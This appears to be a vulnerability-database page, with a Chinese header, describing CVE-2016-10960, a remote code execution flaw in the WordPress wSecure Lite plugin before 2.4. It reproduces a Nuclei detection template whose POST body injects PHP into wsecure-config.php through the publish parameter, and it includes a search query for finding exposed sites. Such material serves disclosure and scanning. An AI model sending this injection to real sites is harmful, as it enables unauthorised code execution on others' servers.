CVE-2016-10960: WordPress wSecure Lite < 2.4 - Remote Code Execution

日期: 2025-08-01 | 影响软件: WordPress wSecure Lite | POC: 已公开

漏洞描述

WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.

PoC代码[已公开]

id: CVE-2016-10960

info:
  name: WordPress wSecure Lite < 2.4 - Remote Code Execution
  author: daffainfo
  severity: high
  description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.
  reference:
    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
    - https://wordpress.org/plugins/wsecure/#developers
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2016-10960
    cwe-id: CWE-20
    epss-score: 0.58125
    epss-percentile: 0.98128
    cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*
  metadata:
    max-request: 1
    vendor: joomlaserviceprovider
    product: wsecure
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wsecure"
  tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"

    body: 'wsecure_action=update&publish=";} header("{{name}}: CVE-2016-10960"); class WSecureConfig2 {var $test="'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "{{name}}: CVE-2016-10960"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206a23b3577ed14e3c08f3d79fef6fa0e7eedab792c04dd96e56b14c2b8fd5edbd022001b17d9527843ca93a1e1da008eb0e2e8c206b538dec8e175cbccebb72062d9e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐